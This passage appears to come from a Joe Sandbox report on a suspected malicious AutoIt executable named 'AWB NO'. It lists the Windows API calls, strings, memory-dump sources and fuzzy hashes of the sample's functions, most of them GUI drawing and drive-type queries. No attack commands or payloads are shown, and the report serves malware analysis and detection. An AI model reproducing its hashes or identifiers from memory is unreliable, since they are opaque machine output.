                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477DD0
                                                              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477DD9
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477DE8
                                                              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477DF1
                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477DF8
                                                              • GlobalFree.KERNEL32(00000000), ref: 00477E03
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477E15
                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00492CAC,00000000), ref: 00477E2B
                                                              • GlobalFree.KERNEL32(00000000), ref: 00477E3B
                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00477E61
                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00477E80
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477EA2
                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0047808F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                              • API String ID: 2211948467-2373415609
                                                              • Opcode ID: dbc4653a972677e53609990ad40b6c0cf63322c92cba6e77ba978192a45e68e3
                                                              • Instruction ID: 4027d4b4abb4e188d55970fa8cfcc6921f63087b8bf6fa6cc9ac8d02474ea374
                                                              • Opcode Fuzzy Hash: dbc4653a972677e53609990ad40b6c0cf63322c92cba6e77ba978192a45e68e3
                                                              • Instruction Fuzzy Hash: 3A027F71900105EFDB14DFA4CD89EAE7BB9EF48314F14856EF909AB2A1CB749D01CB68
                                                              Function 004837F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,0048F910), ref: 004838AF
                                                              • IsWindowVisible.USER32(?), ref: 004838D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpperVisibleWindow
                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                              • API String ID: 4105515805-45149045
                                                              • Opcode ID: 4d8ea619d8eb5df5b836e152f9d92a0df573529dda71b620040fc2caefa91cd3
                                                              • Instruction ID: c6bf011bc8920b3f385404e467a371699bc6c18566bcfe3a2ae0969e2ceda94a
                                                              • Opcode Fuzzy Hash: 4d8ea619d8eb5df5b836e152f9d92a0df573529dda71b620040fc2caefa91cd3
                                                              • Instruction Fuzzy Hash: 0CD162302142059FCB14FF15C451A6E77E1EF54749F10486EB8866B3A3CB79EE0ACB9A
                                                              Function 0048A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetTextColor.GDI32(?,00000000), ref: 0048A89F
                                                              • GetSysColorBrush.USER32(0000000F), ref: 0048A8D0
                                                              • GetSysColor.USER32(0000000F), ref: 0048A8DC
                                                              • SetBkColor.GDI32(?,000000FF), ref: 0048A8F6
                                                              • SelectObject.GDI32(?,?), ref: 0048A905
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A930
                                                              • GetSysColor.USER32(00000010), ref: 0048A938
                                                              • CreateSolidBrush.GDI32(00000000), ref: 0048A93F
                                                              • FrameRect.USER32(?,?,00000000), ref: 0048A94E
                                                              • DeleteObject.GDI32(00000000), ref: 0048A955
                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A9A0
                                                              • FillRect.USER32(?,?,?), ref: 0048A9D2
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048A9FD
                                                                • Part of subcall function 0048AB60: GetSysColor.USER32(00000012), ref: 0048AB99
                                                                • Part of subcall function 0048AB60: SetTextColor.GDI32(?,?), ref: 0048AB9D
                                                                • Part of subcall function 0048AB60: GetSysColorBrush.USER32(0000000F), ref: 0048ABB3
                                                                • Part of subcall function 0048AB60: GetSysColor.USER32(0000000F), ref: 0048ABBE
                                                                • Part of subcall function 0048AB60: GetSysColor.USER32(00000011), ref: 0048ABDB
                                                                • Part of subcall function 0048AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048ABE9
                                                                • Part of subcall function 0048AB60: SelectObject.GDI32(?,00000000), ref: 0048ABFA
                                                                • Part of subcall function 0048AB60: SetBkColor.GDI32(?,00000000), ref: 0048AC03
                                                                • Part of subcall function 0048AB60: SelectObject.GDI32(?,?), ref: 0048AC10
                                                                • Part of subcall function 0048AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0048AC2F
                                                                • Part of subcall function 0048AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048AC46
                                                                • Part of subcall function 0048AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0048AC5B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                              • String ID:
                                                              • API String ID: 4124339563-0
                                                              • Opcode ID: 2be1cd76be687764b985c11cf6801488acbcb5b119113e32da2173a325024a23
                                                              • Instruction ID: 452232081cd78e43451fe9d0edc745e4d0d3487f89d4aa1c860563aee330a7d3
                                                              • Opcode Fuzzy Hash: 2be1cd76be687764b985c11cf6801488acbcb5b119113e32da2173a325024a23
                                                              • Instruction Fuzzy Hash: ACA17D72408301BFD710AF64DC08A6F7BA9FB89321F104E3EF962961A1D774D859CB56
                                                              Function 00402C18 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 486windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                                                              • DeleteObject.GDI32(00000000), ref: 00402CE8
                                                              • DeleteObject.GDI32(00000000), ref: 00402CF3
                                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C68B
                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C6C4
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043CAED
                                                                • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                              • SendMessageW.USER32(?,00001053), ref: 0043CB2A
                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043CB41
                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043CB57
                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043CB62
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                              • String ID: 0
                                                              • API String ID: 464785882-4108050209
                                                              • Opcode ID: 8bb651e3813426e3b2906523babd31f652832d467135021f94eae9fb0a9951ba
                                                              • Instruction ID: c5daa602b1da6e2c88f559f2981f7132431180b83a6a7b57709d98132a53226c
                                                              • Opcode Fuzzy Hash: 8bb651e3813426e3b2906523babd31f652832d467135021f94eae9fb0a9951ba
                                                              • Instruction Fuzzy Hash: 9D12B030604201EFDB14DF24C988BAAB7E1BF09314F54557EE885EB2A2C779EC42CB59
                                                              Function 004777BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DestroyWindow.USER32(00000000), ref: 004777F1
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004778B0
                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004778EE
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00477900
                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477946
                                                              • GetClientRect.USER32(00000000,?), ref: 00477952
                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477996
                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004779A5
                                                              • GetStockObject.GDI32(00000011), ref: 004779B5
                                                              • SelectObject.GDI32(00000000,00000000), ref: 004779B9
                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004779C9
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004779D2
                                                              • DeleteDC.GDI32(00000000), ref: 004779DB
                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00477A07
                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00477A1E
                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477A59
                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00477A6D
                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00477A7E
                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00477AAE
                                                              • GetStockObject.GDI32(00000011), ref: 00477AB9
                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00477AC4
                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00477ACE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                              • API String ID: 2910397461-517079104
                                                              • Opcode ID: 0bb5904a0bc9c17cf0b78fe31b67cc0506789462837ce2f9fbc2ba5e89c8bcb1
                                                              • Instruction ID: 6f2dc87351e9f44073fe66d28d4e3a5abbc81402cfb86126b8eda0833aba6fd6
                                                              • Opcode Fuzzy Hash: 0bb5904a0bc9c17cf0b78fe31b67cc0506789462837ce2f9fbc2ba5e89c8bcb1
                                                              • Instruction Fuzzy Hash: 8EA19271A00205BFEB14DFA4DC4AFAE7BB9EB44714F118569FA14A72E1C774AD00CB68
                                                              Function 0046AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046AF89
                                                              • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046B066
                                                              • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046B1C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DriveType
                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                              • API String ID: 2907320926-4222207086
                                                              • Opcode ID: cc900fc70ce812e212ff46acfe6d33c29d60af325789446386c82a3afa452452
                                                              • Instruction ID: 776fc6ea3dd3f9210f8b2b9a0ff9a4140feb8d65df7228a0847dc19c69f0f078
                                                              • Opcode Fuzzy Hash: cc900fc70ce812e212ff46acfe6d33c29d60af325789446386c82a3afa452452
                                                              • Instruction Fuzzy Hash: C9519330688205BBCB14EB11C952AFE77B0EB55385730402BE406E7291EB7D9D929B9F
                                                              Function 0048AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSysColor.USER32(00000012), ref: 0048AB99
                                                              • SetTextColor.GDI32(?,?), ref: 0048AB9D
                                                              • GetSysColorBrush.USER32(0000000F), ref: 0048ABB3
                                                              • GetSysColor.USER32(0000000F), ref: 0048ABBE
                                                              • CreateSolidBrush.GDI32(?), ref: 0048ABC3
                                                              • GetSysColor.USER32(00000011), ref: 0048ABDB
                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048ABE9
                                                              • SelectObject.GDI32(?,00000000), ref: 0048ABFA
                                                              • SetBkColor.GDI32(?,00000000), ref: 0048AC03
                                                              • SelectObject.GDI32(?,?), ref: 0048AC10
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0048AC2F
                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048AC46
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0048AC5B
                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048ACA7
                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048ACCE
                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0048ACEC
                                                              • DrawFocusRect.USER32(?,?), ref: 0048ACF7
                                                              • GetSysColor.USER32(00000011), ref: 0048AD05
                                                              • SetTextColor.GDI32(?,00000000), ref: 0048AD0D
                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AD21
                                                              • SelectObject.GDI32(?,0048A869), ref: 0048AD38
                                                              • DeleteObject.GDI32(?), ref: 0048AD43
                                                              • SelectObject.GDI32(?,?), ref: 0048AD49
                                                              • DeleteObject.GDI32(?), ref: 0048AD4E
                                                              • SetTextColor.GDI32(?,?), ref: 0048AD54
                                                              • SetBkColor.GDI32(?,?), ref: 0048AD5E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 1996641542-0
                                                              • Opcode ID: c6d7f8f7a6e67db7bcbc459dcf04a5177850833b8e4cf3a1b88a004a17d10486
                                                              • Instruction ID: 2680c5cb8e69463474aeacce461c7d25b1e5fd9f16fef23a59f5f5dba328ec77
                                                              • Opcode Fuzzy Hash: c6d7f8f7a6e67db7bcbc459dcf04a5177850833b8e4cf3a1b88a004a17d10486
                                                              • Instruction Fuzzy Hash: 88617171900218FFDF11DFA4DC48EAE7B79EB08320F10492AF911AB2A1D7B59D50DB94
                                                              Function 00484B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 00484C51
                                                              • GetDesktopWindow.USER32 ref: 00484C66
                                                              • GetWindowRect.USER32(00000000), ref: 00484C6D
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00484CCF
                                                              • DestroyWindow.USER32(?), ref: 00484CFB
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484D24
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484D42
                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484D68
                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00484D7D
                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484D90
                                                              • IsWindowVisible.USER32(?), ref: 00484DB0
                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484DCB
                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484DDF
                                                              • GetWindowRect.USER32(?,?), ref: 00484DF7
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00484E1D
                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00484E37
                                                              • CopyRect.USER32(?,?), ref: 00484E4E
                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00484EB9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                              • String ID: ($0$tooltips_class32
                                                              • API String ID: 698492251-4156429822
                                                              • Opcode ID: f331351360268a1b5d7d8b914c2b9c9323f39334a68d66cdc55574e05c4d5c59
                                                              • Instruction ID: 81ce0c80fb3ce83a9a695b2ca3c7f4fe6b6ee7cd94759bd4250ac35758565499
                                                              • Opcode Fuzzy Hash: f331351360268a1b5d7d8b914c2b9c9323f39334a68d66cdc55574e05c4d5c59
                                                              • Instruction Fuzzy Hash: 71B15A71604341AFDB04EF65C844B6EBBE4BF84314F00892EF599AB2A1D778EC05CB99
                                                              Function 00488C44 Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 401windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488D34
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488D45
                                                              • CharNextW.USER32(0000014E), ref: 00488D74
                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488DB5
                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488DCB
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488DDC
                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488DF9
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00488E45
                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488E5B
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488E8C
                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488EFA
                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488F83
                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488FDB
                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00489088
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004890AA
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004890F4
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00489121
                                                              • DrawMenuBar.USER32(?), ref: 00489130
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00489158
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                              • String ID: 0
                                                              • API String ID: 1015379403-4108050209
                                                              • Opcode ID: ca9ace00d0f2b43eae45c5b40dd063dad2892ad7e0ff4c496d02d35709906946
                                                              • Instruction ID: 06ae97bc04d9bd9a605fd07afab84948b7726a7264b26731c3a6e1cfb59002d2
                                                              • Opcode Fuzzy Hash: ca9ace00d0f2b43eae45c5b40dd063dad2892ad7e0ff4c496d02d35709906946
                                                              • Instruction Fuzzy Hash: 60E1B270900209AADF10AF54CC88EFF7BB8EF05314F54895FF915A6290DB788A85DF69
                                                              Function 004027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                                                              • GetSystemMetrics.USER32(00000007), ref: 004028C4
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                                                              • GetSystemMetrics.USER32(00000008), ref: 004028F7
                                                              • GetSystemMetrics.USER32(00000004), ref: 0040291C
                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                                                              • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                                                              • GetStockObject.GDI32(00000011), ref: 004029CA
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                                                                • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                                                • Part of subcall function 00402344: ScreenToClient.USER32(004C67B0,?), ref: 00402374
                                                                • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                              • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                              • String ID: AutoIt v3 GUI
                                                              • API String ID: 1458621304-248962490
                                                              • Opcode ID: 463adb09294f08f2b550a3aac66e477959837ac27b60c120b9cefca0ac7b2281
